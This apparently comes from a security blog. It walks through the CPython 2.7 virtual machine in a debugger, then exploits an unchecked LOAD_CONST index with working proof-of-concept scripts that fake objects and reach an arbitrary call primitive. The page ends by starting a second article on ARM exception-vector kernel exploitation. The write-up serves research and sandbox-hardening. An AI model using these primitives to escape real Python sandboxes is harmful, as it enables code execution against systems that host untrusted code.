The first rule of the VM is that it handles only Python objects. A Python object is basically made of two parts:

  • The first one is a header, which is mandatory for all objects. It is defined like this:
#define PyObject_HEAD                   \
  _PyObject_HEAD_EXTRA                \
  Py_ssize_t ob_refcnt;               \
  struct _typeobject *ob_type;

#define PyObject_VAR_HEAD               \
  PyObject_HEAD                       \
  Py_ssize_t ob_size; /* Number of items in variable part */
  • The second one is the variable part that describes the specifics of your object. Here is for example PyStringObject:
typedef struct {
  PyObject_VAR_HEAD
  long ob_shash;
  int ob_sstate;
  char ob_sval[1];

  /* Invariants:
    *     ob_sval contains space for 'ob_size+1' elements.
    *     ob_sval[ob_size] == 0.
    *     ob_shash is the hash of the string or -1 if not computed yet.
    *     ob_sstate != 0 iff the string object is in stringobject.c's
    *       'interned' dictionary; in this case the two references
    *       from 'interned' to this object are *not counted* in ob_refcnt.
    */
} PyStringObject;

Now, some of you may ask yourselves "How does Python know the type of an object when it receives a pointer?". In fact, this is exactly the role of the ob_type field. Python exports a static _typeobject variable that describes the type of the object. Here is, for instance, PyString_Type:

PyTypeObject PyString_Type = {
  PyVarObject_HEAD_INIT(&PyType_Type, 0)
  "str",
  PyStringObject_SIZE,
  sizeof(char),
  string_dealloc,                             /* tp_dealloc */
  (printfunc)string_print,                    /* tp_print */
  0,                                          /* tp_getattr */
  // ...
};

Basically, every string object will have its ob_type field pointing to that PyString_Type variable. With this cute little trick, Python is able to do type checking like this:

#define Py_TYPE(ob)             (((PyObject*)(ob))->ob_type)
#define PyType_HasFeature(t,f)  (((t)->tp_flags & (f)) != 0)
#define PyType_FastSubclass(t,f)  PyType_HasFeature(t,f)

#define PyString_Check(op) \
  PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_STRING_SUBCLASS)

#define PyString_CheckExact(op) (Py_TYPE(op) == &PyString_Type)
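The difference between the two macros has a rough equivalent at the Python level, shown in the sketch below. It is only an analogy and runs on Python 3, where str is the unicode type and the matching C macros have different names ; the class `MyStr` is made up for the example.

```python
class MyStr(str):
    """A subclass: its type is not str itself, but it still derives from str."""
    pass

s = MyStr('abc')
print(isinstance(s, str))   # True, comparable to PyString_Check (subclasses accepted)
print(type(s) is str)       # False, comparable to PyString_CheckExact (exact type only)
```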

With the previous tricks, and the PyObject type defined as follows, Python is able to handle the different objects in a generic fashion:

typedef struct _object {
  PyObject_HEAD
} PyObject;

So when you are in your debugger and you want to know what type of object it is, you can use that field to identify easily the type of the object you are dealing with:

0:000> dps 026233b0 l2
026233b0  00000001
026233b4  1e226798 python27!PyString_Type

Once you have done that, you can dump the variable part describing your object to extract the information you want. By the way, all the native objects are implemented in the Objects/ directory.

Debugging session: stepping the VM. The hard way.

It's time for us to go a little bit deeper, at the assembly level, where we belong ; so let's define a dummy function like this one:

def a(b, c):
  return b + c

Now using Python's dis module, we can disassemble the function object a:

In [20]: dis.dis(a)
2   0 LOAD_FAST                0 (b)
    3 LOAD_FAST                1 (c)
    6 BINARY_ADD
    7 RETURN_VALUE
In [21]: a.func_code.co_code
In [22]: print ''.join('\\x%.2x' % ord(i) for i in a.__code__.co_code)
\x7c\x00\x00\x7c\x01\x00\x17\x53

In [23]: opcode.opname[0x7c]
Out[23]: 'LOAD_FAST'
In [24]: opcode.opname[0x17]
Out[24]: 'BINARY_ADD'
In [25]: opcode.opname[0x53]
Out[25]: 'RETURN_VALUE'
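The same decoding can be done by hand. The sketch below (Python 3, with a made-up function name) assumes the Python 2.7 encoding, where opcodes greater than or equal to 0x5a (HAVE_ARGUMENT in 2.7) are followed by a 16-bit little-endian argument, and applies it to the eight bytes printed above.

```python
HAVE_ARGUMENT = 0x5A  # Python 2.7 value

def decode(code):
    """Return (offset, opcode, argument) tuples for a Python 2.7 bytecode string."""
    out = []
    i = 0
    while i < len(code):
        op = code[i]
        if op >= HAVE_ARGUMENT:
            arg = code[i + 1] | (code[i + 2] << 8)
            out.append((i, op, arg))
            i += 3
        else:
            out.append((i, op, None))
            i += 1
    return out

print(decode(b'\x7c\x00\x00\x7c\x01\x00\x17\x53'))
# [(0, 124, 0), (3, 124, 1), (6, 23, None), (7, 83, None)]
```

The offsets 0, 3, 6 and 7 are the ones dis prints in its second column.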

Keep in mind, as we said earlier, that everything is an object ; so a function is an object, and bytecode is an object as well:

typedef struct {
  PyObject_HEAD
  PyObject *func_code;  /* A code object */
  // ...
} PyFunctionObject;
/* Bytecode object */
typedef struct {
    PyObject_HEAD
    //...
    PyObject *co_code;    /* instruction opcodes */
    //...
} PyCodeObject;

Time to attach my debugger to the interpreter to see what's going on in that weird machine, and to place a conditional breakpoint on PyEval_EvalFrameEx. Once you have done that, you can call the dummy function:

0:000> bp python27!PyEval_EvalFrameEx+0x2b2 ".if(poi(ecx+4) == 0x53170001){}.else{g}"
breakpoint 0 redefined

0:000> g
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea914=7c

0:000> db ecx l8
025ea914  7c 00 00 7c 01 00 17 53                          |..|...S

OK perfect, we are in the middle of the VM, and our function is being evaluated. The register ECX points to the bytecode being evaluated, and the first opcode is LOAD_FAST.

Basically, this opcode takes an object from the fastlocals array and pushes it on the virtual stack. In our case, as we saw in both the disassembly and the bytecode dump, we are going to load the index 0 (the argument b), then the index 1 (argument c).

Here's what it looks like in the debugger ; first step is to load the LOAD_FAST opcode:

0:000>
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea914=7c

In ECX we have a pointer onto the opcodes of the function being evaluated, our dummy function. 0x7c is the value of the LOAD_FAST opcode as we can see:

#define LOAD_FAST 124 /* Local variable number */

Then, the function needs to check whether the opcode has an argument, which is done by comparing the opcode with a constant value called HAVE_ARGUMENT:

0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec568 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b8:
1e0ec568 83f85a          cmp     eax,5Ah

Again, we can verify the value to be sure we understand what we are doing:

In [11]: '%x' % opcode.HAVE_ARGUMENT
Out[11]: '5a'

Definition of HAS_ARG in C:

#define HAS_ARG(op) ((op) >= HAVE_ARGUMENT)

If the opcode has an argument, the function needs to retrieve it (the argument is 16 bits wide and is fetched one byte at a time):

0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec571 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
python27!PyEval_EvalFrameEx+0x2c1:
1e0ec571 0fb67901        movzx   edi,byte ptr [ecx+1]       ds:002b:025ea916=00

As expected for the first LOAD_FAST the argument is 0x00, perfect. After that the function dispatches the execution flow to the LOAD_FAST case defined as follows:

#define GETLOCAL(i)     (fastlocals[i])
#define Py_INCREF(op) (                         \
    _Py_INC_REFTOTAL  _Py_REF_DEBUG_COMMA       \
    ((PyObject*)(op))->ob_refcnt++)
#define PUSH(v)                BASIC_PUSH(v)
#define BASIC_PUSH(v)     (*stack_pointer++ = (v))

case LOAD_FAST:
  x = GETLOCAL(oparg);
  if (x != NULL) {
    Py_INCREF(x);
    PUSH(x);
    goto fast_next_opcode;
  }
  //...
  break;

Let's see what it looks like in assembly:

0:000>
eax=0000007c ebx=00000000 ecx=0000007b edx=00000059 esi=1e222c0c edi=00000000
eip=1e0ec5cf esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x31f:
1e0ec5cf 8b54246c        mov     edx,dword ptr [esp+6Ch] ss:002b:0027fd44=98ef6b02

After getting the fastlocals, we can retrieve an entry:

0:000>
eax=0000007c ebx=00000000 ecx=0000007b edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec5d3 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x323:
1e0ec5d3 8bb4ba38010000  mov     esi,dword ptr [edx+edi*4+138h] ds:002b:026bf0d0=a0aa5e02

Also keep in mind we called our dummy function with two strings, so let's actually check it is a string object:

0:000> dps 025eaaa0 l2
025eaaa0  00000004
025eaaa4  1e226798 python27!PyString_Type

Perfect, now according to the definition of PyStringObject:

typedef struct {
    PyObject_VAR_HEAD
    long ob_shash;
    int ob_sstate;
    char ob_sval[1];
} PyStringObject;

We should find the content of the string directly in the object:

0:000> db 025eaaa0 l1f
025eaaa0  04 00 00 00 98 67 22 1e-05 00 00 00 dd 16 30 43  .....g".......0C
025eaab0  01 00 00 00 48 65 6c 6c-6f 00 00 00 ff ff ff     ....Hello......

Awesome, we have the size of the string at the offset 0x8, and the actual string is at 0x14.
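The dump can also be parsed mechanically. This Python 3 sketch assumes the 32-bit layout discussed above (five 4-byte fields, then the characters) and simply feeds the bytes of the dump to struct ; the variable names mirror the C field names.

```python
import struct

# The bytes shown by `db 025eaaa0 l1f` above
dump = bytes.fromhex(
    '04 00 00 00 98 67 22 1e 05 00 00 00 dd 16 30 43'
    '01 00 00 00 48 65 6c 6c 6f 00 00 00 ff ff ff'
)

# ob_refcnt, ob_type, ob_size, ob_shash, ob_sstate: 4 bytes each on x86
ob_refcnt, ob_type, ob_size, ob_shash, ob_sstate = struct.unpack_from('<iIiii', dump, 0)
ob_sval = dump[0x14:0x14 + ob_size]

print(ob_refcnt, hex(ob_type), ob_size)  # 4 0x1e226798 5
print(ob_sval)                           # b'Hello'
```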

Let's move on to the second opcode now, this time with fewer details though:

0:000> 
eax=0000007c ebx=00000000 ecx=025ea917 edx=026bef98 esi=025eaaa0 edi=00000000
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea917=7c

This time, we are loading the second argument, so the index 1 of fastlocals. We can type-check the object and dump the string stored in it:

0:000> 
eax=0000007c ebx=00000000 ecx=0000007b edx=026bef98 esi=025eaaa0 edi=00000001
eip=1e0ec5d3 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x323:
1e0ec5d3 8bb4ba38010000  mov     esi,dword ptr [edx+edi*4+138h] ds:002b:026bf0d4=c0af5e02
0:000> db poi(026bf0d4) l1f
025eafc0  04 00 00 00 98 67 22 1e-05 00 00 00 39 4a 25 29  .....g".....9J%)
025eafd0  01 00 00 00 57 6f 72 6c-64 00 5e 02 79 00 00     ....World.^.y..

Now comes the BINARY_ADD opcode:

0:000> 
eax=0000007c ebx=00000000 ecx=025ea91a edx=026bef98 esi=025eafc0 edi=00000001
eip=1e0ec562 esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea91a=17

Here it's supposed to retrieve the two objects on the top-of-stack, and add them. The C code looks like this:

#define SET_TOP(v)        (stack_pointer[-1] = (v))

case BINARY_ADD:
  w = POP();
  v = TOP();
  if (PyInt_CheckExact(v) && PyInt_CheckExact(w)) {
    // Not our case
  }
  else if (PyString_CheckExact(v) &&
            PyString_CheckExact(w)) {
      x = string_concatenate(v, w, f, next_instr);
      /* string_concatenate consumed the ref to v */
      goto skip_decref_vx;
  }
  else {
    // Not our case
  }
  Py_DECREF(v);
skip_decref_vx:
  Py_DECREF(w);
  SET_TOP(x);
  if (x != NULL) continue;
  break;

And here is the assembly version where it retrieves the two objects from the top-of-stack:

0:000> 
eax=00000017 ebx=00000000 ecx=00000016 edx=0000000f esi=025eafc0 edi=00000000
eip=1e0eccf5 esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa45:
1e0eccf5 8b75f8          mov     esi,dword ptr [ebp-8] ss:002b:026bf0d8=a0aa5e02
...

0:000> 
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=00000000
eip=1e0eccfb esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa4b:
1e0eccfb 8b7dfc          mov     edi,dword ptr [ebp-4] ss:002b:026bf0dc=c0af5e02

0:000> 
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=025eafc0
eip=1e0eccfe esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa4e:
1e0eccfe 83ed04          sub     ebp,4

A bit further we have our string concatenation:

0:000> 
eax=025eafc0 ebx=00000000 ecx=0027fcd0 edx=026bef98 esi=025eaaa0 edi=025eafc0
eip=1e0eb733 esp=0027fcb8 ebp=00000005 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
python27!PyEval_SliceIndex+0x813:
1e0eb733 e83881fcff      call    python27!PyString_Concat (1e0b3870)

0:000> dd esp l3
0027fcb8  0027fcd0 025eafc0 025eaaa0

0:000> p
eax=025eaaa0 ebx=00000000 ecx=00000064 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0eb738 esp=0027fcb8 ebp=00000005 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
python27!PyEval_SliceIndex+0x818:
1e0eb738 8b442418        mov     eax,dword ptr [esp+18h] ss:002b:0027fcd0=c0aa5e02

0:000> db poi(0027fcd0) l1f
025eaac0  01 00 00 00 98 67 22 1e-0a 00 00 00 ff ff ff ff  .....g".........
025eaad0  00 00 00 00 48 65 6c 6c-6f 57 6f 72 6c 64 00     ....HelloWorld.

And the last part of the case is to push the resulting string onto the virtual stack (SET_TOP operation):

0:000> 
eax=025eaac0 ebx=025eaac0 ecx=00000005 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0ecb82 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200213
python27!PyEval_EvalFrameEx+0x8d2:
1e0ecb82 895dfc          mov     dword ptr [ebp-4],ebx ss:002b:026bf0d8=a0aa5e02

Last part of our deep dive, the RETURN_VALUE opcode:

0:000> 
eax=025eaac0 ebx=025eafc0 ecx=025ea91b edx=026bef98 esi=025eaac0 edi=025eafc0
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea91b=53

All right, at least now you have a more precise idea about how that Python virtual machine works, and more importantly how you can directly debug it without symbols. Of course, you can download the debug symbols on Linux and use that information in gdb ; it should make your life easier (....but I hate gdb man...).

Note that I would love very much to have a debugger at the Python bytecode level, it would be much easier than instrumenting the interpreter. If you know one ping me! If you build one ping me too :-).

The bug

Here is the bug, spot it and give it some love:

#ifndef Py_DEBUG
#define GETITEM(v, i) PyTuple_GET_ITEM((PyTupleObject *)(v), (i))
#else
//...
/* Macro, trading safety for speed <-- LOL, :) */ 
#define PyTuple_GET_ITEM(op, i) (((PyTupleObject *)(op))->ob_item[i])

case LOAD_CONST:
  x = GETITEM(consts, oparg);
  Py_INCREF(x);
  PUSH(x);
  goto fast_next_opcode;

This may be a bit obscure for you, but keep in mind we control the index oparg and the content of consts. That means we can just push untrusted data on the virtual stack of the VM: brilliant. Getting a crash out of this bug is fairly easy, try to run these lines (on a Python 2.7 distribution):

import opcode
import types

def a():
  pass

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG']) + '\xef\xbe' +
  chr(opcode.opmap['LOAD_CONST'])   + '\xad\xde',
  (), (), (), '', '', 0, ''
)
a()

..and as expected you get a fault (oparg is edi):

(2058.2108): Access violation - code c0000005 (!!! second chance !!!)
[...]
eax=01cb1030 ebx=00000000 ecx=00000063 edx=00000046 esi=1e222c0c edi=beefdead
eip=1e0ec5f7 esp=0027e7f8 ebp=0273a9f0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
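The faulting address can be recomputed from the registers in the dump. The sketch below (Python 3, helper names made up) first rebuilds oparg from the EXTENDED_ARG and LOAD_CONST argument bytes of the crashing script, then models the `[eax+edi*4+0Ch]` addressing mode with 32-bit wrap-around.

```python
def combine(extended_arg_bytes, arg_bytes):
    """EXTENDED_ARG supplies the high 16 bits, the next opcode's argument the low 16."""
    high = int.from_bytes(extended_arg_bytes, 'little')
    low = int.from_bytes(arg_bytes, 'little')
    return (high << 16) | low

def item_address(tuple_address, index):
    """Model `[eax+edi*4+0Ch]`: ob_item starts at +0xc and holds 4-byte pointers."""
    return (tuple_address + index * 4 + 0xC) & 0xFFFFFFFF

oparg = combine(b'\xef\xbe', b'\xad\xde')
print(hex(oparg))                            # 0xbeefdead, the value seen in edi
print(hex(item_address(0x01CB1030, oparg)))  # 0xfd8a8af0, the address that faults
```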

By the way, some readers might have caught the same type of bug in LOAD_FAST with the fastlocals array ; those readers are definitely right :).

Walking through the PoC

OK, so if you look only at the faulting instruction you could say that the bug is minor and we won't be able to turn it into something "useful". But the essential part of exploiting a piece of software is to completely understand how it works. Then you are more capable of turning bugs that seem useless into interesting primitives.

As we said several times, from Python code you can't really push any value you want onto the Python virtual stack, obviously. The machine is only dealing with Python objects. However, with this bug we can corrupt the virtual stack by pushing arbitrary data that we control. If you do that well, you can end up causing the Python VM to call whatever address you want. That's exactly what I did back when I wrote python27_abuse_vm_to_execute_x86_code.py.

In Python we are really lucky because we can control a lot of things in memory and we have natively a way to "leak" (I shouldn't call that a leak though because it's a feature) the address of a Python object with the function id. So basically we can do stuff, we can do it reliably and we can manage to not break the interpreter, like bosses.

Pushing attacker-controlled data on the virtual stack

We control oparg and the content of the tuple consts. We can also find out the address of that tuple. So we can have a Python string object that stores an arbitrary value, let's say 0xdeadbeef and it will be pushed on the virtual stack.

Let's do that in Python now:

import opcode
import types
import struct

def pshort(s):
    return struct.pack('<H', s)

def a():
  pass

consts = ()
s = '\xef\xbe\xad\xde'
address_s = id(s) + 20 # 20 is the offset of the array of byte we control in the string
address_consts = id(consts)
# python27!PyEval_EvalFrameEx+0x347:
# 1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff
high = offset >> 16
low =  offset & 0xffff
print 'Consts tuple @%#.8x' % address_consts
print 'Address of controled data @%#.8x' % address_s
print 'Offset between const and our object: @%#.8x' % offset
print 'Going to push [%#.8x] on the virtual stack' % (address_consts + (address_s - address_consts - 0xC) + 0xc)

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG']) + pshort(high) +
  chr(opcode.opmap['LOAD_CONST'])   + pshort(low),
  consts, (), (), '', '', 0, ''
)
a()

..annnnd..

D:\>python 1.py
Consts tuple @0x01db1030
Address of controled data @0x022a0654
Offset between const and our object: @0x0013bd86
Going to push [0x022a0654] on the virtual stack

*JIT debugger pops*

eax=01db1030 ebx=00000000 ecx=00000063 edx=00000046 esi=deadbeef edi=0013bd86
eip=1e0ec5fb esp=0027fc68 ebp=01e63fc0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
python27!PyEval_EvalFrameEx+0x34b:
1e0ec5fb ff06            inc     dword ptr [esi]      ds:002b:deadbeef=????????

0:000> ub eip l1
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch]

0:000> ? eax+edi*4+c
Evaluate expression: 36308564 = 022a0654

0:000> dd 022a0654 l1
022a0654  deadbeef <- the data we control in our PyStringObject

0:000> dps 022a0654-0n20 l2
022a0640  00000003
022a0644  1e226798 python27!PyString_Type

Perfect, we control a part of the virtual stack :).
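
The index arithmetic used in the script can be checked in isolation. The sketch below is Python 3 and the function names are mine; it assumes a 32-bit build where the tuple items start at offset 0xc, as the faulting instruction shows. The mask also makes targets located below the tuple work, because the address computation wraps around on 32 bits.

```python
MASK32 = 0xffffffff
OB_ITEM_OFFSET = 0xc  # offset of the item array in a 32-bit PyTupleObject

def const_index(target, consts_addr):
    """Index to hand to LOAD_CONST so that consts[index] reads the dword at target."""
    delta = target - consts_addr - OB_ITEM_OFFSET
    if delta % 4:
        raise ValueError('target must be 4-byte aligned relative to the tuple items')
    return (delta // 4) & MASK32

def split_oparg(index):
    """(EXTENDED_ARG operand, LOAD_CONST operand)"""
    return index >> 16, index & 0xffff

def effective_address(consts_addr, index):
    """What mov esi, [eax+edi*4+0Ch] ends up reading, wrap-around included."""
    return (consts_addr + index * 4 + OB_ITEM_OFFSET) & MASK32

# Values taken from the run above
index = const_index(0x022a0654, 0x01db1030)
print(hex(index))                                 # 0x13bd86
print(hex(effective_address(0x01db1030, index)))  # 0x22a0654
```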

Game over, CALL_FUNCTION

Once you control the virtual stack, the only limit is your imagination and the ability you have to find an interesting spot in the virtual machine. My idea was to craft a PyFunctionObject somehow, push it onto the virtual stack and then use the CALL_FUNCTION opcode on it.

typedef struct {
  PyObject_HEAD
  PyObject *func_code;  /* A code object */
  PyObject *func_globals; /* A dictionary (other mappings won't do) */
  PyObject *func_defaults;  /* NULL or a tuple */
  PyObject *func_closure; /* NULL or a tuple of cell objects */
  PyObject *func_doc;   /* The __doc__ attribute, can be anything */
  PyObject *func_name;  /* The __name__ attribute, a string object */
  PyObject *func_dict;  /* The __dict__ attribute, a dict or NULL */
  PyObject *func_weakreflist; /* List of weak references */
  PyObject *func_module;  /* The __module__ attribute, can be anything */
} PyFunctionObject;

The thing is, as we saw earlier, the virtual machine usually ensures the type of the object it handles. If the type checking fails, the function bails out and we are not happy, at all. It means we would need an information-leak to obtain a pointer to the PyFunction_Type static variable.

Fortunately for us, CALL_FUNCTION can still be abused without knowing that magic pointer to craft our object correctly. Let's go over the source code to illustrate what I mean:

case CALL_FUNCTION:
{
  PyObject **sp;
  PCALL(PCALL_ALL);
  sp = stack_pointer;
  x = call_function(&sp, oparg);

static PyObject *
call_function(PyObject ***pp_stack, int oparg)
{
  int na = oparg & 0xff;
  int nk = (oparg>>8) & 0xff;
  int n = na + 2 * nk;
  PyObject **pfunc = (*pp_stack) - n - 1;
  PyObject *func = *pfunc;
  PyObject *x, *w;

  if (PyCFunction_Check(func) && nk == 0) {
    // ..Nope..
  } else {
    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
      // ..Still Nope...
    } else
    if (PyFunction_Check(func))
      // Nope!
    else
      x = do_call(func, pp_stack, na, nk);

static PyObject *
do_call(PyObject *func, PyObject ***pp_stack, int na, int nk)
{
  // ...
  if (PyCFunction_Check(func)) {
    // Nope
  }
  else
    result = PyObject_Call(func, callargs, kwdict);

PyObject *
PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw)
{
  ternaryfunc call;

  if ((call = func->ob_type->tp_call) != NULL) {
    PyObject *result;
    // Yay an interesting call :)
    result = (*call)(func, arg, kw);

So basically the idea to use CALL_FUNCTION was a good one, but we will need to craft two different objects:

  1. The first one will be a PyObject with ob_type pointing to the second object
  2. The second object will be a _typeobject with tp_call the address you want to call

This is fairly trivial to do and will give us an absolute-call primitive without crashing the interpreter: s.w.e.e.t.
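
Before looking at the real script, here is a tiny Python 3 model of the pointer chase func->ob_type->tp_call over the two fake objects. It is only a sketch: memory is modelled as a dictionary, the two addresses are made up, and the offsets assume a 32-bit Python 2.7 build (ob_type at +4, tp_call at +0x40, which is why the second string starts with 0x40 bytes of padding).

```python
import struct

OB_TYPE_OFFSET = 4     # PyObject_HEAD on a 32-bit build: ob_refcnt, then ob_type
TP_CALL_OFFSET = 0x40  # tp_call inside a 32-bit Python 2.7 type object

def fake_type(call_target):
    """Second object: padding up to tp_call, then the address we want called."""
    return b'A' * TP_CALL_OFFSET + struct.pack('<I', call_target)

def fake_object(type_addr):
    """First object: a junk ob_refcnt followed by ob_type."""
    return b'AAAA' + struct.pack('<I', type_addr)

def read32(memory, addr):
    """Read a little-endian dword from a {base_address: bytes} model of memory."""
    for base, blob in memory.items():
        if base <= addr and addr + 4 <= base + len(blob):
            return struct.unpack_from('<I', blob, addr - base)[0]
    raise KeyError(hex(addr))

def resolve_call(memory, obj_addr):
    """Mimic the lookup done by PyObject_Call before it calls through tp_call."""
    ob_type = read32(memory, obj_addr + OB_TYPE_OFFSET)
    return read32(memory, ob_type + TP_CALL_OFFSET)

# Hypothetical addresses standing in for id(string) + 20
TYPE_ADDR, OBJ_ADDR = 0x02000000, 0x02100000
memory = {TYPE_ADDR: fake_type(0xdeadbeef), OBJ_ADDR: fake_object(TYPE_ADDR)}
print(hex(resolve_call(memory, OBJ_ADDR)))  # 0xdeadbeef
```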

import opcode
import types
import struct

def pshort(s):
  return struct.pack('<H', s)

def puint(s):
  return struct.pack('<I', s)

def a():
  pass

PyStringObject_to_char_array_offset = 20
second_object = 'A' * 0x40 + puint(0xdeadbeef)
addr_second_object = id(second_object)
addr_second_object_controled_data = addr_second_object + PyStringObject_to_char_array_offset

first_object = 'AAAA' + puint(addr_second_object_controled_data)
addr_first_object = id(first_object)
addr_first_object_controled_data = addr_first_object + PyStringObject_to_char_array_offset

consts = ()
s = puint(addr_first_object_controled_data)
address_s = id(s) + PyStringObject_to_char_array_offset
address_consts = id(consts)
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG'])  + pshort(offset >> 16)     +
  chr(opcode.opmap['LOAD_CONST'])    + pshort(offset & 0xffff)  +
  chr(opcode.opmap['CALL_FUNCTION']) + pshort(0),
  consts, (), (), '', '', 0, ''
)
a()

And we finally get our primitive working :-)

(11d0.11cc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Python\Python275\python27.dll - 
eax=01cc1030 ebx=00000000 ecx=00422e78 edx=00000000 esi=deadbeef edi=02e62df4
eip=deadbeef esp=0027e78c ebp=02e62df4 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010283
deadbeef ??              ???

So now you know all the nasty things going under the hood with that python27_abuse_vm_to_execute_x86_code.py script!

Conclusion, Ideas

After reading this little post you are now aware that if you want to sandbox Python effectively, you should do it outside of Python and not by preventing the use of some modules or things like that: this is broken by design. The virtual machine is not safe enough to build a strong sandbox inside Python, so don't rely on such a thing if you don't want to get surprised. An article about that exact same thing was written here if you are interested: The failure of pysandbox.

You also may want to look at PyPy's sandboxing capability if you are interested in executing untrusted Python code. Otherwise, you can build your own SECCOMP-based system :).

On the other hand, I had a lot of fun taking a deep dive into Python's source code and I hope you had some too! If you would like to know more about the low level aspects of Python here is a list of interesting posts:

Folks, that's all for today ; don't hesitate to contact us if you have a cool post!

Corrupting the ARM Exception Vector Table

Introduction

A few months ago, I was writing a Linux kernel exploitation challenge on ARM in an attempt to learn about kernel exploitation and I thought I'd explore things a little. I chose the ARM architecture mainly because I thought it would be fun to look at. This article is going to describe how the ARM Exception Vector Table (EVT) can aid in kernel exploitation in case an attacker has a write what-where primitive. It will be covering a local exploit scenario as well as a remote exploit scenario. Please note that corrupting the EVT has been mentioned in the paper "Vector Rewrite Attack"[1], which briefly talks about how it can be used in NULL pointer dereference vulnerabilities on an ARM RTOS.

The article is broken down into two main sections. First, a brief description of the ARM EVT and its implications from an exploitation point of view (please note that a number of things about the EVT will be omitted to keep this article relatively short). Then, we will go over two examples showing how we can abuse the EVT.

I am assuming the reader is familiar with Linux kernel exploitation and knows some ARM assembly (seriously).

ARM Exceptions and the Exception Vector Table

